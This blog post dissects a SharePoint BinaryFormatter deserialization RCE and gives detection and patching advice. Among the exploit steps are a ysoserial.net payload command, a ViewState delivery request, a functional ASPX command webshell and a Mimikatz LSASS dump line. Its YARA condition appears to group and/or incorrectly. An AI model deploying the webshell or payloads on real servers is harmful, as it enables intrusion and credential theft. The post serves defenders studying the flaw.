CVE-2026-20963 Microsoft SharePoint Deserialization RCE - Technical Deep Dive

Posted Mar 19, 2026

By sensibleclown

10 min read

Executive Summary

CVE-2026-20963 is a high-severity Remote Code Execution (RCE) vulnerability in Microsoft Office SharePoint, rooted in the insecure deserialization of untrusted data (CWE-502). Published to the NVD on January 13, 2026, and added to CISA’s Known Exploited Vulnerabilities (KEV) catalog on March 18, 2026, this vulnerability is now actively exploited in the wild.

The attack requires only low-privilege authenticated access — any standard SharePoint user can potentially weaponize this flaw to execute arbitrary code on the server, exfiltrate sensitive data, drop webshells, and move laterally throughout the corporate network.

Given SharePoint’s ubiquity as a document management and collaboration platform in enterprise environments, the blast radius of this vulnerability is significant.

CVE Summary

Field	Detail
CVE ID	CVE-2026-20963
Product	Microsoft Office SharePoint
Vulnerability Type	Deserialization of Untrusted Data (CWE-502)
CVSS v3.1 Score	8.8 (High)
Attack Vector	Network
Attack Complexity	Low
Privileges Required	Low (authenticated user)
User Interaction	None
Impact	Full CIA triad compromise
Published	January 13, 2026 (NVD)
CISA KEV Added	March 18, 2026
Patch Available	Yes — January 2026 Patch Tuesday

Affected Versions

Product	Vulnerable Version	Patched Version
SharePoint Server Subscription Edition	< 16.0.19127.20442	≥ 16.0.19127.20442
SharePoint Server 2019	< 16.0.10417.20083	≥ 16.0.10417.20083
SharePoint Enterprise Server 2016	< 16.0.5535.1001	≥ 16.0.5535.1001

Background: What Is Deserialization and Why Is It Dangerous?

Serialization is the process of converting an in-memory object into a format (binary, XML, JSON) that can be stored or transmitted. Deserialization is the reverse — reconstructing the object from that data.

The danger: when an application deserializes data from an untrusted source without validation, an attacker can craft a malicious payload that, when reconstructed into an object, triggers unintended code execution.

Normal Flow:
[Legitimate Object] → serialize → [Binary/XML Data] → transmit → deserialize → [Object Reconstructed]

Malicious Flow:
[Crafted Payload] → transmit → deserialize → [Gadget Chain Triggered] → [Arbitrary Code Executed]

In .NET applications like SharePoint, this is especially dangerous due to the BinaryFormatter class.

The Root Cause: `BinaryFormatter` and .NET Gadget Chains

BinaryFormatter — The Ticking Time Bomb

BinaryFormatter is a .NET class historically used to serialize and deserialize objects in binary format. Microsoft itself now describes it as “dangerous and cannot be made secure” — yet SharePoint has relied on it across multiple internal mechanisms:

SPObjectStateFormatter (web part state management)
ViewState processing
Metadata processing workflows
Internal caching layers

When SharePoint uses BinaryFormatter to deserialize user-supplied or user-influenced data, it opens the door to gadget chain exploitation.

What Is a Gadget Chain?

A gadget chain is a sequence of legitimate .NET method calls that, when chained together during deserialization, produce a malicious outcome. The attacker doesn’t inject new code — they manipulate the control flow using existing code already loaded in the process.

Deserialization begins
    ↓
Object constructor called
    ↓
Property setter triggers method A (legitimate code in .NET base class)
    ↓
Method A calls method B (legitimate code in a dependency)
    ↓
Method B calls method C (legitimate code in SharePoint assembly)
    ↓
Method C executes: Process.Start("cmd.exe /c <attacker command>")
    ↓
[Arbitrary code runs in context of SharePoint application pool]

Tools like ysoserial.net automate this — given a target .NET version and available assemblies, it generates a ready-to-use malicious serialized payload:

  
# Conceptual usage of ysoserial.net
# NOT for unauthorized use
ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter \
  -c "powershell -enc <base64_payload>" \
  -o base64

The output: a base64-encoded binary blob that, when deserialized by the vulnerable SharePoint component, executes the specified command.

Exploit Mechanics: Step-by-Step

Step 1: Reconnaissance

The attacker identifies a target SharePoint deployment and authenticates with any low-privilege account (standard domain user, guest account, or credentials obtained via phishing/password spray).

  
GET /_layouts/15/start.aspx HTTP/1.1
Host: sharepoint.target.corp
Authorization: NTLM [token]

Key recon targets:

SharePoint version (check /_vti_pvt/service.cnf or error pages)
List of endpoints that accept serialized data
Application pool identity (determines privilege level of RCE)

Step 2: Craft the Malicious Payload

Using ysoserial.net or a custom gadget chain targeting the identified .NET version:

  
// Conceptual payload structure — simplified
// The actual binary payload encodes a TypeConfuseDelegate gadget chain
// targeting .NET's Comparison<T> delegate to invoke Process.Start()

var payload = new TypeConfuseDelegateMarshal {
    Delegate = new Comparison<string>((x, y) => {
        System.Diagnostics.Process.Start("cmd.exe", "/c whoami > C:\\inetpub\\wwwroot\\output.txt");
        return 0;
    })
};

// Serialize with BinaryFormatter → produces malicious binary blob
BinaryFormatter bf = new BinaryFormatter();
bf.Serialize(stream, payload);

Common attacker goals embedded in payload:

whoami / hostname (initial recon)
Deploy ASPX webshell to SharePoint’s /_layouts/ directory
Add attacker to local admins
Invoke reverse shell / Cobalt Strike beacon

Step 3: Deliver the Payload

The serialized payload is submitted to a vulnerable SharePoint endpoint via HTTP POST — targeting internal endpoints that process deserialized data:

  
POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit HTTP/1.1
Host: sharepoint.target.corp
Content-Type: application/x-www-form-urlencoded
Cookie: FedAuth=[valid_auth_cookie]

__VIEWSTATE=<base64_encoded_malicious_payload>&...

Alternatively, through:

Web Part management endpoints
REST API endpoints accepting application/xml or binary payloads
List/Library metadata upload endpoints

Step 4: Server Deserializes — Code Executes

The SharePoint application pool worker process (w3wp.exe) deserializes the payload:

w3wp.exe (NETWORK SERVICE or IIS APPPOOL\SharePoint)
    └─ deserialize(malicious_payload)
        └─ gadget chain fires
            └─ cmd.exe /c [attacker command]
                └─ [arbitrary code executes]

The code runs with the privileges of the SharePoint application pool identity — typically NETWORK SERVICE or a dedicated service account, which often has:

Read/write access to SharePoint content databases
Access to connected Microsoft 365 / Azure AD services
Network access to internal systems

Step 5: Post-Exploitation

Once code execution is confirmed, attackers typically:

Deploy a webshell:

<!-- Webshell dropped to /_layouts/15/shell.aspx -->
<%@ Page Language="C#" %>
<%
    string cmd = Request["c"];
    System.Diagnostics.Process p = new System.Diagnostics.Process();
    p.StartInfo.FileName = "cmd.exe";
    p.StartInfo.Arguments = "/c " + cmd;
    p.StartInfo.UseShellExecute = false;
    p.StartInfo.RedirectStandardOutput = true;
    p.Start();
    Response.Write(p.StandardOutput.ReadToEnd());
%>

Credential dumping:

  
# Access SharePoint config DB for service account credentials
# Or dump LSASS from memory
Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'

Lateral movement:

Pass-the-hash to other servers in the domain
Abuse SharePoint’s integration with Exchange / Teams / OneDrive
Pivot to Azure AD if SharePoint is hybrid-connected

Persistence:

Scheduled tasks
IIS module implants
SharePoint solution package (.wsp) containing malicious code

Attack Flow Diagram

[Attacker] — authenticates with any low-priv account
     │
     │ HTTP POST with malicious serialized payload
     ▼
[SharePoint Server] — w3wp.exe deserializes payload
     │
     │ BinaryFormatter + gadget chain fires
     ▼
[Code Execution] — runs as application pool identity
     │
     ├──► Drop ASPX webshell in /_layouts/
     ├──► Credential dumping (LSASS, SharePoint config DB)
     ├──► Lateral movement to AD / Exchange / Azure
     └──► Data exfiltration (SharePoint documents, lists)

Historical Context: SharePoint’s Deserialization Problem

CVE-2026-20963 is part of a long pattern — SharePoint’s recurring deserialization vulnerabilities:

CVE	Year	Auth Required	Notes
CVE-2020-1147	2020	Low	DataSet gadget chain, .NET BinaryFormatter
CVE-2024-38023	2024	Low (Site Owner)	Serialized payload via API
CVE-2024-38094	2024	Low	Authenticated RCE
CVE-2025-30382	2025	Low	Metadata workflow deserialization
CVE-2025-53770	2025	None	Unauthenticated “ToolShell” RCE
CVE-2026-20963	2026	Low	BinaryFormatter gadget chain, CISA KEV

The root cause is consistent across all: SharePoint’s continued reliance on BinaryFormatter in legacy code paths, combined with insufficient input validation on endpoints that accept user data.

Microsoft is progressively deprecating BinaryFormatter (.NET 9 throws exceptions on use by default), but SharePoint’s legacy codebase makes full migration slow.

Detection

Windows Event Logs

Event ID 4688 (Process Creation):
  - w3wp.exe spawning cmd.exe, powershell.exe, wscript.exe
  - New processes with parent = w3wp.exe and unusual command lines

Event ID 4698 (Scheduled Task Created):
  - Unexpected tasks created by NETWORK SERVICE or SharePoint service account

Event ID 7045 (New Service Installed):
  - Unexpected services installed post-exploitation

IIS / SharePoint Logs

Indicators in IIS logs:
- POST requests to /_layouts/15/*.aspx with unusually large __VIEWSTATE values
- POST requests to /_api/ endpoints with binary content types
- HTTP 200 responses to endpoints that should return 302/403 for unauthenticated users
- Requests to newly created .aspx files in /_layouts/15/ (webshells)

Behavioral / EDR Detection

High-priority detections:
- w3wp.exe → cmd.exe / powershell.exe (direct child process)
- w3wp.exe writing .aspx files outside normal SharePoint directories
- LSASS memory access from w3wp.exe or child processes
- Outbound network connections from w3wp.exe to external IPs
- Large outbound data transfers from SharePoint server

YARA Rule (Webshell Detection)

rule SharePoint_ASPX_Webshell {
    meta:
        description = "Detects ASPX webshells dropped in SharePoint layouts"
        author = "Security Research"
        date = "2026-03-19"
    strings:
        $s1 = "Request[" ascii
        $s2 = "Process.Start" ascii
        $s3 = "cmd.exe" ascii
        $layout = "/_layouts/15/" ascii
    condition:
        filesize < 50KB and
        $layout and
        ($s1 and $s2) or ($s1 and $s3)
}

Mitigation & Remediation

Priority 1: Patch Immediately

Apply the January 2026 Patch Tuesday updates:

Version	Target Build
SharePoint Subscription Edition	16.0.19127.20442
SharePoint Server 2019	16.0.10417.20083
SharePoint Enterprise Server 2016	16.0.5535.1001

Verify installed build: SharePoint Central Administration → Upgrade and Migration → Check product and patch installation status.

Priority 2: Restrict Privileges

- Audit Site Owner assignments — limit to trusted users only
- Review SharePoint application pool service account permissions
- Apply principle of least privilege to SharePoint service accounts
- Disable or restrict access to /_layouts/ endpoints not in use

Priority 3: Network Controls

- Block direct internet access from SharePoint servers (egress filtering)
- Implement WAF rules to detect anomalous ViewState / large POST bodies
- Network segmentation: SharePoint servers should not have unrestricted 
  lateral access to domain controllers or sensitive servers
- Monitor outbound connections from IIS worker processes (w3wp.exe)

Priority 4: ASP.NET Machine Key Rotation

ViewState-based deserialization attacks rely on valid machine keys to generate valid MACs. Rotating machine keys invalidates any pre-generated payloads:

  
# Generate new machine key values
$rng = [System.Security.Cryptography.RNGCryptoServiceProvider]::new()
$validationKey = New-Object byte[] 64
$decryptionKey = New-Object byte[] 32
$rng.GetBytes($validationKey)
$rng.GetBytes($decryptionKey)

# Update web.config machineKey section on all SharePoint servers
# (requires coordinated rollout to avoid session invalidation)

Priority 5: Monitoring & Alerting

- Deploy EDR on all SharePoint servers with w3wp.exe child process alerts
- Enable and centralize IIS access logs → SIEM
- Alert on creation of .aspx files in SharePoint system directories
- Monitor SharePoint ULS logs for deserialization exceptions
- Implement honeypot accounts — any auth from service accounts should alert

MITRE ATT&CK Mapping

Tactic	Technique	ID
Initial Access	Exploit Public-Facing Application	T1190
Execution	Exploitation for Client Execution	T1203
Persistence	Server Software Component: Web Shell	T1505.003
Privilege Escalation	Exploitation for Privilege Escalation	T1068
Defense Evasion	Masquerading	T1036
Credential Access	OS Credential Dumping	T1003
Lateral Movement	Use Alternate Authentication Material	T1550
Collection	Data from Information Repositories: SharePoint	T1213.002
Exfiltration	Exfiltration Over C2 Channel	T1041

Conclusion

CVE-2026-20963 is a textbook example of why insecure deserialization continues to top the OWASP Top 10. The technical barrier is low — any authenticated SharePoint user can potentially achieve full server compromise. The business impact is severe — SharePoint often sits at the heart of enterprise document management, HR systems, and internal communications.

The CISA KEV addition on March 18, 2026 confirms active exploitation. Organizations still running unpatched SharePoint are almost certainly already targeted.

Patch. Monitor. Segment. In that order, as fast as possible.

References

This post is intended for security researchers, enterprise defenders, and IT administrators. Code samples are illustrative and based on publicly available research.

security

This post is licensed under CC BY 4.0 by the author.